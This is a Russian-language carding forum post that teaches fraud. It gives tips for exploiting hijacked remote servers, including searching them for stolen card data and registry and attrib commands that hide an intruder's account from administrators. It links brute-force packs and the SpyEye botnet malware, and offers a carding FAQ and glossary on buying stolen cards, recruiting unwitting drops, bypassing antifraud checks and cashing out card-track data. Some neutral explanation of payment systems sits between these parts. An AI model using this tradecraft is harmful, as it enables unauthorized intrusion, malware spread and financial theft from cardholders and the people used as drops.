для этого есть програмка которая находит слова в тексте ! (например ищите СС? Вводите на дедике слово свзяаное с СС например CVV и если на дедике есть прога найдет!) скачать можно тут http://i-vd.org.ru/soft/find-txt.shtml Описание программы Folder Find Text и ещё один софт называется Everything - Программа для поиска файлов тут видео http://www.youtube.com/watch?v=wbZ2RV4Jp8U

4.Уметь быть скрытным на дедике от администратора

во первых надо чистить дедик посел каждого входа и выхода... во вторых надо иметь Админку на дедике... дабы тебя от туда не выкинули)) в третьих надо спрятать свой профиль на дедике) как это сделать?

Для WIN дедика заходишь в командную строку (cmd.exe) и пишешь:

Убрать учетку из меню выбора пользователей:

PHP код:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v пользователь /t REG_DWORD /d "00000000" /f

Еще разумно скрыть папку с файлами на учетке:
attrib +h +s "C:\Documents and Settings\пользователь"

где "пользователь" - имя твоей учетки (например, user).

А также подробная инфа может быть описанна тут http://forum.hackersoft.ru/showthread.php?p=94873#post94873

5.Нескольким видам получения дедиков

Приватный словарь, который собран из 30 млн SQL записей

Технология получения доступа с использованием минимума ресурсов компьютера

ответ на все эти вопросы вы найдете тут ) http://rghost.ru/47626356 пароль на скачивание 648968874 в паке находятся разные брутфорсы статьи и многое другое вообщем ВСЕ что нужно для обогощения дедиками))

6.Получать роутеры с минимальными потерями траффика

тут я бессилен т. к. я кардер и с трафиком такого рода дел не имел... да и мне не нужно... но все таки почитайте эту статью http://rutracker.org/forum/viewtopic.php?t=2953621

7.Получать уязвимые сайты и превращать их в прокси с шифрованием

на этот вопрос отвечает все таже прога proxy switcher http://rutracker.org/forum/viewtopic.php?t=3516193 вставляешь ссылку она сканит прокси и скосы... а вообще ребят на заметку прокси далеко уже не в теме и стоят они всего 1$ максимальная цена за хороший прокси... имхо ДОХНУТ они быстро!

8.Быстро создавать ботнет

создать быстро ботнет это легко... т. к. версий в паблике просто полно разных ддосеров а также вирей я бы посоветовал бы spyeye скачать его можно тут ЗАЛИВАЛ САМ!! http://my-files.ru/h4g0.%D0%93%D0%BB%D0%B0%D0%B7%D0%BE%D0%BA.rar СРАЗУ СКАЖУ ЧТО АНТИВИРЬ БУДЕТ РУГАТСЯ ))! но самое главное что для ботнета нужен Трафик сплойты либо инжекции которые стоят как минимум от 500$ и выше... а также загрузки которые стоят примерно также )) но опять же ботнет можно иметь для разных целей )

9.Защищать свой дедик и компьютер от взлома

о дедиках мы уже говорили )) а теперь о компьютере ) есть такая веселая программка

http://tech.pp.ru/trans/truecryptrus/ TureCrypt) также в мануале о шифровании есть статьи про эту прогу !

10.Создать свой прокси сервис, или выгодно продать свою базу селлерам прокси и дедиков

как я уже и говорил прокси быстро дохнут и жить им от 20 минут до 12 часов) а дедике это определенная тема... как я уже писал выше ) http://rghost.ru/47626356пароль 648968874 тут есть не только софт как достать дедики но и свой собственный онлайн шоп по дедикам! Таким образам вы можите добывать дедике раскрутить свой шоп и продавтаь дедики ОНЛАЙН!

Механизм работы платежных систем

Кредитная карта, в первую очередь, является внешней частью твоего банковского счета. Работу кредитной системы обеспечивают: платежная система, банки, производители; простая покупка по кредитке представляет собой довольно сложный механизм. Об этом и многом другом я сегодня расскажу.

Механизм оплаты

Почти любая финансовая операции при использовании кредитки начинается с авторизации. Во время этого этапа необходимо определить, есть ли у тебя на счете необходимые средства и можешь ли ты ими воспользоваться. Авторизация может проводиться любым доступным способом. Решение об авторизации может принять сама карта (в случае карты с микросхемой) – это метод называется off-line, т.е. связываться ни с кем не надо. В противном случае необходимо запросить подтверждение у банка: запрос отправляется в первую очередь эквайреру (в процессинговый центр), затем пересылается эмитенту, который принимает решение, ответ перенаправляется снова эквайреру и только потом возвращается на место запроса (такой метод называется on-line). Это процесс может проходить через сеть, или продавец может просто спросить – голосом или по факсу.

Если авторизация подтверждена, то дальше ты можешь в полной мере распоряжаться зарезервированной суммой. Если ответ на запрос не пришел, то – извини. И это еще не худший вариант - в ответ может прийти приказ продавцу изъять у тебя карту (например, если они числится потерянной или украденной). Поэтому авторизация является ключевым этапом сделки. В редких случаях авторизации может и не быть, подробнее об этом ниже.

Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца. То есть - ты уже ушел из магазина, забрав покупки, а продавец все еще ждет свои деньги. Для начала эмитент отправляет запрос на перевод зарезервированных средств расчетному банку, который доставит их счет эквайрера, который уже, в свою очередь, перенаправит их туда, где ты совершил покупку. За перевод средств эквайрер оставит себе небольшой процент от суммы, за срочность процент будет больше. В общей сложности продавцу придется ждать денег от нескольких часов до нескольких дней. За это многие магазины не любят обслуживать креды.

Вся совокупность финансовых операций по кредам от начала до конца называется взаимообменом (или interchange).

Что нам может дать банк

С банковской точки зрения креды можно разделить на три основных класса. Это важно, так как этим определяется, каким образом ты сможешь распоряжаться своими деньгами или брать в кредит.

1. Дебетовые (расчетные) карты – ты можешь использовать только те средства, которые досрочно положил на свой счет. Такую креду получить проще всего, и стоит она дешевле остальных (иногда их даже выдают бесплатно). Никакой кредит или перерасход средств по расчетной карте не предусмотрен. Кстати, дебетовые карты являются самыми распространенными.

2. Кредитные карты – служат для получения определенного (заранее оговоренного) кредита под определенный процент на определенный срок. К сожалению, процент довольно велик – от 10 до 40% годовых для России. На счет карты деньги вносить не нужно. Соответственно, чем больший кредит дается по карте, тем ее сложнее получить и тем она элитнее (сумма кредита может доходить до нескольких десятков тысяч баксов). Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

3. Овердрафтные карты (почти то же самое, что кредитно-дебетовая карта) – расчетные карты с кредитным лимитом. Можно класть деньги на счет и выполнять определенный перерасход. Кредит дается обычно на срок от одного до трех месяцев, но чем дольше у тебя остается долг, тем больший ты должен будешь выплатить процент. ИМХО, такие карты самые удобные.

По привычке и дебетовые, и овердрафтные, и кредитные карты называют просто кредитными (кредитками/кредами), что, как видишь, не совсем верно.

Кстати, самую первую свою кредитку можно приобрести уже с 14 лет.

В принципе, продавцу/банкомату абсолютно неважно, по какой карте ты расплачиваешься (твои это средства или кредит), они даже не знают, сколько денег у тебя на счету. Но в некоторых местах дебетовые креды не принимают, в отличие от кредитных или кредитно-дебетовых (в чем одно из их преимуществ).

Кстати, по кредитным или овердрафтным картам очень часто кидают банк. Порой банку практически невозможно законно вернуть себе весь кредит даже через суд, если клиент отказывается возвращать деньги (тут, по решению суда, они могут только вычитать некоторый процент из официальной (!) зарплаты должника). Поэтому в России долгое время рядовым клиентам предоставлялись исключительно дебетовые карты (даже если карта была кредитной по определению). Лишь в последние несколько лет стало реальным купить полноценную кредитную карту.

Еще очень важную роль играет такой показатель, как лимит суммы, на которую ты можешь совершить покупку без авторизации (наличие средств на креде не проверяется, а банку-эмитенту просто направляется платежное поручение на данную сумму). К сожалению, такая сумма сравнительно мала (около $50). Вот еще один из способов обуть банк, можно даже по пустой или левой креде. Хотя, по большому счету, банку твои 50 баксов как капля в море (сильно ты их не расстроишь). В России такая система мало распространена, а жаль.

Платежные системы

Всевозможных платежных систем в мире несчетное количество - в каждой стране своя и чаще всего не одна, есть также и международные системы. Кстати, к платежным системам относятся не только банковские, но еще и системы путешествий и развлечений – так называемыеT&E (Travel & Entertainment), например, American Express и Dinners Club. Из международных систем выделяются всего несколько крупнейших: Visa, Eurocard/MasterCard, American Express (AmEx) & Dinners Club International (DCI). Также можно отметить самые масштабные системы в России: Union Card, STB и Золотая корона (правда, преимущества этих систем очень сомнительны из-за их малой распространенности). Кстати, в России, в отличие от других стран, для того, чтобы стать эмитентом, необходима специальная лицензия Центробанка.

Бесспорно, самая популярная система в мире – Visa. Эта система применяется примерно в 20000 банках в 72 странах мира, про количество пользователей говорить не имеет смысла - с каждым днем их число неуклонно растет.

Вторая по величине система Europay International. Она объединяет в себе сразу две крупных подсистемы: Eurocard/MasterCard и Cirrus/Maestro.

Теперь немного про составляющие платежной системы. За функционирование системы отвечают несколько участников (точнее, видов участников). Это эмитенты, эквайреры и расчетные банки. Каждый из участников должен четко выполнять свои функции. Эквайрер – банк, который обслуживает все необходимые финансовые сделки по кредам. Эмитент – сама организация, которая выпустила креду. Расчетные банки играют роль регуляторов между всеми участниками сделки (следят за переводом денежных средств и прочее). Нужно отметить, что за это отвечают не обязательно разные банки – все эти функции может выполнять один-единственный банк.

Классы карт

Каждая платежная система выпускает несколько видов кред, чтобы любой смог выбрать кредитку, нужную именно ему. Класс карты определяет почти все ее характеристики (остальные определяет банк). Обычно выпускаются креды электронного (для банкоматов и терминалов), экономичного, стандартного и элитного класса. Чем дороже карта, тем больше у нее преимуществ: большой лимит кредита, принимается в большем количестве мест, ты получаешь множество всяких скидок, подарков и прочего, плюс, конечно, великолепный сервис.

Visa предлагает на выбор кредитки Electron, Classic, Gold, Platinum и несколько других, более редких. Я расположил креды в порядке их стоимости. За годовое обслуживание Visa Electron берут примерно 5 баксов, за Classic – 25, а за Gold – все 100. Visa Electron предназначена только для использования в банкоматах и электронных терминалах в магазинах. Classic и Gold – кредитки класса повыше, но для их использования необходимо, чтобы баланс твоего счета не опускался ниже определенной суммы: обычно $100 для Classic и $1000 для Gold (хотя иногда такое ограничение банками опускается). Различие между Classic и Gold довольно незначительно, отличаются они в основном большим количеством дополнительных фишек у последней. Это были дебетовые карточки. Visa Platinum – это уже овердрафтная карта. Стоит эта карта соответственно названию, и получить ее тяжело. Но за это ты получаешь кредитный лимит в $20000 и просто немыслимое количество всяких страховок, скидок и прочего и прочего.

В системе Eurocard/MasterCard применяются аналогичные креды: Cirrus/Maestro, Mass, Gold. Все характеристики примерно те же, что и у Visa.

Электронные карты

Ни для кого не секрет, что по кредиткам можно расплачиваться и в инете. Все бы хорошо, но тут возникает большая проблема безопасности. Для оплаты покупки непосредственно в интернет-магазине приходится сообщать свои идентификационные данные, после этого их конфиденциальность оказывается под угрозой. Для того чтобы обезопасить все финансовые операции через Сеть, созданы специальные платежные подсистемы. Таких систем в инете очень много, пожалуй, самая известная в России – WebMoney, но она не ориентируется на работу с кредитками, поэтому WebMoney я рассматривать не буду. Прочие популярные системы: CyberPlat, ASSIST, PayCash, RBS и ЭлИТ. Принцип функционирования этих систем примерно одинаков – они являются посредниками между тобой, банком и интернет-магазином. Конечно, за свои услуги они оставляют себе некоторый процент от суммы сделки, но зато гарантируют сохранность твоих средств и конфиденциальность данных. Почти все эти системы обеспечивают работу с картами международных платежных систем Visa, Eurocard/Mastercard, American Express и Dinners Club, а также иногда обслуживают и креды российских платежных систем.

Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL; используется цифровая подпись; гарантируется юридическая чистота обеих сторон; используются особые сертификаты SET; полная выписка счета обо всех проведенных финансовых операциях. Такая схема удобна и продавцам, и покупателям, которым не жалко отдать какую-то сумму за безопасность. Есть у таких систем и свои минусы: например, можно работать только с магазином, зарегистрированным в данной сети. Также иногда для работы необходимо поставить фирменную программу.

Итого

Вот, собственно, и все, что я хотел рассказать про роль и функции кредиток в финансовой системе. На тему кредиток пишут диссертации, создают целые порталы в Сети, пишут огромные документации. Сам понимаешь, весь этот материал просто невозможно было охватить, но я постарался описать все самое существенное и примечательное.

Словарь

Аверс – лицевая сторона кредитки

Импринтер – девайс у продавца, делающий отпечаток эмбоссированных данных на чек

Картридер – устройство для чтения данных с карты

Расчетный банк – банк, регулирующий финансовые операции между участниками сделки

Реверс – оборотная сторона креды

Типпинг – процесс оттиска эмбоссированных данных на чек

Эквайрер – банк, входящий в платежную систему и обслуживающий все финансовые операции по кредам

Эмбоссинг – процесс выдавливания (тиснение) текста на поверхности кредитки, таким образом выдавливают номер креды/дату окончания ее действия/кард-холдерс-нейм и прочее (отсюда название карт - эмбоссированные)

Эмитент – организация, выпустившая карточку

Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца.

Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL.


Q: Что такое креды, CC, картон и где их достать?

A: Это и есть кредитные карты, именно благодаря им существуем мы.

Способов достать CC много - от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.

Q: Я новичек в кардинге. В какой теме лучше начать работать?

A: Если вообще ноль в кардинге, то мой тебе совет начинать с вбива, для того чтобы хоть немного получить представление о кардинге. Прочти все статьи в этом разделе - это поможет тебе составить хоть какое-то представление о нашем деле.

Настрой машину для вбива, обеспечь себе безопасность и ищи работодателя.

Q: Кто такой вбивальшик?

A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.

Q: Примерно сколько получает вбивальщик за свою работу?

A: Ну это все зависет от того как вы договаритесь со своим работадателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.

Q: Что такое эмитет?

A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank

Q: Что такое бин?

A: Бин это первые 4 или 6 символов в номере кредитной карты, именно по нему и узнают что за банк эмитирует кредитную карту, а также тип карты.

Q: Что такое CVV/CVV2 код?

A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.

Q: Как выглядит информация по кредитной карте?

A: Подробнее об этом вы можете узнать здесь

Q: Что такое карты с Full Info и зачем они нужны?

A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.

DOB - Date of birth

SSN - Social Security Number

MMN - Mothers Maiden Name

Некоторые фулки включают в себя PIN => они же дампы.

Для обнала такой карты тебе нужны след. данные cc# ,exp, PIN,определённый бин по которому налят (т.е. если у карты нет track2,чтобы генераторщик смог пробить его по определённым бинам) и естественно опытный нальщик.

Q: Кто такой дроп?

A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.

Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?

A: По идеи конечно вас должны будут искать, но на практике это бессмыслено, т.к. ваши поиски выльются в более крупные суммы.

Q: Что такое PayPal или палка?

A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.

Q: Вы не могли бы подсказать шопы которые 100% шлют товар?

A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.

Q: Что такое tracking number или трэк?

A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.

Q: Как мне перевести деньги с кредитной карты на WM?

A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney несуществует.

Q: Что такое фрауд?

A: В переводе с английского "мошенничество", в принципе перевод полностью отображает значение этого термина.

Q: Что такое антифрод и как его обойти?

A: Это система защиты от мошенничества - различные дополнительные проверки.

Как обойти - будь полностью как амер, во всех ипостасях, и будет всё ок.

Иногда проще забить на шоп с сильной системой антифрода, чем пытаться ее обойти.

Credit line - сумма кредита, которую банк дает (доверяет) на траты и покупки сейчас и которую клиент сможет погасить потом.

Current Balance - сколько потратил, столько потом придется возвращать банку.

А из Credit line вычитается

Available Credit - сколько еще можно потратить.

Карта или точнее кредит выдается на год или несколько лет. Поэтому на карте пишется

Expiration date - месяц и год, когда договор с банком закончится. Например 06/2006.

Каждая карта уникальна. Для поддержания этой уникальности на них пишут

Card Number - число, чаще всего 16-ти значное. Реже встречаются 13-ти значные. У American Express по умолчанию 15-ти значное.

Следят и ухаживают за всей этой махиной расчетов по кредитным картам

Visa и Mastercard/Eurocard - международные платежные системы (МПС). У Визы номера карт начинаются на 4, у Мастеркард на 5. Остальные брэнды не так развиты и дальше собственной страны можно сказать не лезут (American Express, Discover, JCB, Золотая Корона и др.)

Бывает, что карты роняют, но не нагибаются за ними, т.к. издали она похожа на кусок мыла, и идут дальше. А поскольку при покупках на большие суммы частенько спрашивают документ, удостоверяющий личность, то для того чтобы внимательные уборщики не могли отовариваться за чужой счет, на лицевой стороне карты пишут

Cardholder's Name - имя и фамилия держателя карты. (Карта - собственность банка. Клиенту она выдается только поносить с собой, т.е. быть этим самым держателем.)

А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на ее обратной стороне пишется

CVC2 или CVV2 - три секретных цифры мелким шрифтом. У Мастеркарда это называется Card Validation Code, у Визы - Card Verification Value.

Чтобы кардхолдер знал сколько он потратил или внес на счет, банк высылает ему

Statement - ежемесячный детализированый отчет обо всех движениях денег на карте, где построчно указаны стоимость кольта, услуг юриста, налога на развлечения и т.д.

Там имеются такие важные для банка и нелюбимые кардхолдерами поля как

Minimum Payment Due - сумма ежемесячного платежа, вычисляемая и пересчитываемая каждый месяц цифра, не менее которой клиент должен вернуть банку за потраченое. Общая сумма долга делится на оставшиеся месяцы до конца договора, накручиваются проценты и все это клиент оплачивает понемножку каждый месяц вместо того чтобы вывалить мешок килобаксов на стол в конце срока. Да и надежней, не сбежит с деньгами и не умрет не вовремя.

Payment Due Date - не позже этого числа каждый месяц кардхолдер и оплачивает свой Minimum Payment Due иначе банк накрутит еще

LATE FEE - посуточный штраф за опоздание платежа.

Из лимитов в стейтменте можно еще увидеть

Cash Advance Limit - такую максимальную сумму можно получить по карте деньгами в банкомате всего (не за один раз). Единоразовый, а точнее суточный лимит по CA чаще всего бывает $500. Но в разных банках он может быть больше или меньше.

Термины в разных банках могут отличаться от вышеприеденных, но надеюсь, суть понятна, чтобы не путать баланс к оплате с лимитом на растраты. Основная путаница возникает из за принципиально иного типа карт - дебетовых. Вот там да, сколько положил на счет, столько и можешь потратить, т.е. баланс в прямом понимании.

-------------------------Слэнг---------------------

billing address, биллинг - адрес проживания, куда отправляется Statement.

billing phone - телефон холдера, по которому звонит банк или шоп в случае каких нибудь неувязок.

shipping address, шиппинг - адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке в свойства карты именно как шиппинг, иначе будут

траблы - trouble, проблема то есть. Траблы с шопом решаются

прозвоном - т.е. звонком в магазин с подтверждением покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но во всех спросят

ордер (order) - номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать

энролл (enroll) - доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. Где-то может понадобиться только

MMN (mother's maiden name) - девичья фамилией матери. Где-то вместе с

DOB (date of birth) - датой рождения. Тде-то только

SSN (social secure number) - индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с

DL (driver's license) - номером водительских прав. Обычно это секретная информация. Но ведь существует

пробив - нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить

фуллку (full info) - все данные кардхолдера, достаточные для регистрации энролла на сайте банка.

Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллиг адрес на адрес своего или чужого

дропа - человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги или красивые обещания, как получится. Вообще этой темой занимается

дроповод - специалист по промыванию мозгов у дропов, чтобы они согласились работать с ворованным товаром. Но бывают не только

разводные дропы - "развели как лоха", но и неразводные дропы. Это партнеры, которые знают, чем занимаются и активно содействуют. Как то ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.

Так вот насчет ордера. Самый лучший и последний его статус:

shipped - отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, можно начинать плясать, уворовано успешно. Только нужно сообщить дроповоду

трэк (tracking number) - уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте выбранной для отправки службы статус посылки, где она находится и что с ней происходит. Как только статус станет

delivered - доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идее). Кстати, следите в каком городе то доставленно. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.

Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул. Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.

Не путайте ДАМПЫ с СС!

Итак, сейчас опишем что у нас должно быть написано на дорожке. Нас интересует вторая дорожка, и что же мы на ней можем увидеть?:

Она может содержать до 40 символов:

Сначала идет стартовый символ - %
Потом идет PAN - до 19 цифр, в нашем случае это номер карты.
В него входит код эмиттера карты (IIN: Issuer Identification Number) (до 6 символов), который в свою очередь состоит из:

Основного промышленного индентификатора (MII: Major Industry Identifier) (до 2х символов):

0: Зарезервированно для будущего использования стандартом ISO/TC 68.
00: Не для выпуска карт
1: Авиалинии.
2: Авиалинии и для будущего использования.
3: Путешествия и развлечения.
4: Банк/финансы.
5: Банк/финансы.
59: Финансовые организации не попадающие в рамки ISO.
6: Банки и мерчи.
7: Топливная промышленность.
8: Телекоммуникации и для будущего использования.
89: Телекоммуникации и для часных агенств.
9: Зарезервировано для национального использования.

Далее идет код эммитера (II: Issuer Identifier), до 5 цифр, в некоторых случаях пишется длинна INN или его размер если он выходит за пределы ISO. Если MII равен 9 то первые три цифры - это код страны(для нас интереса не представляет)

Потом идет индивидуальный номер аккаунта (IAI: Individual Account Identification), до 12 цифр, назначается организацией, выдавшей карту

Затем идет одна цифра, используемая для проверки номера и прочей информации, вычесляется по формуле: (чуть попозже выложу формулу)
PAN мастеркарда состоит из не более 16 символов, а у VISA - 13 или 16, включая проверочную цифру.

Далее идет разделитель, один символ - =

За ним слежует в некоторых случаях код страны(если PAN начинается с 59), он определяется в ISO 3166: 724 для Испании, 840 для USA и тд.

Потом в большинстве случаев идет дата окончания действия карты в формате ГГММ(годмесяц).

Затем идет трехсимвольный сервисный код, он состоит из:

Первая цифра, определяет где можно использовать карту:
0: Зарезервировано для будущего использования.
1: Для международного использования.
2: Для международного использования, с ограничениями.
3: Зарезервировано для будущего использования.
4: Зарезервировано для будущего использования.
5: Только для внутреннего использования, кроме заранее оговоренных соглашений.
6: Только для внутреннего использования, кроме заранее оговоренных соглашений, с ограничениями.
7: Не для оплаты, кроме заранее оговоренных соглашений.
8: Зарезервировано для будущего использования.
9: Для проверки.

Вторая цифра, определяет условия использования/авторизации карты(Authorization processing):
0: Транзакции осуществляются по стандартным правилам.
1: Зарезервировано для будущего использования.
2: Транзакция осуществляется эммитером, должна быть онлайн.
3: Зарезервировано для будущего использования.
4: Транзакция осуществляется эммитером, должна быть онлайн, кроме заранее оговоренных соглашений.
5: Зарезервировано для будущего использования.
6: Зарезервировано для будущего использования.
7: Зарезервировано для будущего использования.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.

Третья цифра, определяет сервисы и условия требования PIN
0: Без ограничений, нужен PIN.
1: Без ограничений.
2: Товары и услуги (не наличка).
3: ATM только и нужен PIN.
4: Только деньги.
5: Товары и услуги (не наличка) и нужен PIN.
6: Без ограничений, PIN по требованию.
7: Товары и услуги (не наличка) и PIN по требованию.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.

Потом идет хэш PVV (PIN Verification Value), 5 символов, за ним символы, зарезервируемые для использования эммитером. И в конце всего стоит завершающий символ - ?

Пример второй дорожки(придуманный): ;4598530106131217=06081211834918387276?

Обзор методов взлома смарт-карт

Индустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы.

Причины этого просты - области применения смарт-карт все время расширяются: от телефонной карты до жетона аутентификации пользователя ПК, от "электронного кошелька" для хранения цифровых наличных до цифрового паспорта-идентификатора. Массовое внедрение смарт-карт в повседневную жизнь сопровождается непременными заверениями официальных представителей индустрии о том, что чип-карты - это наиболее безопасная из существующих на сегодня технологий, которую сложно (читай - практически невозможно) вскрыть. Но мы с тобой знаем, что это вовсе не так :).

Нравится это кому-то или нет, но вскрытие смарт-карт - явление весьма давнее и распространенное повсеместно.
Продолжение следует...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх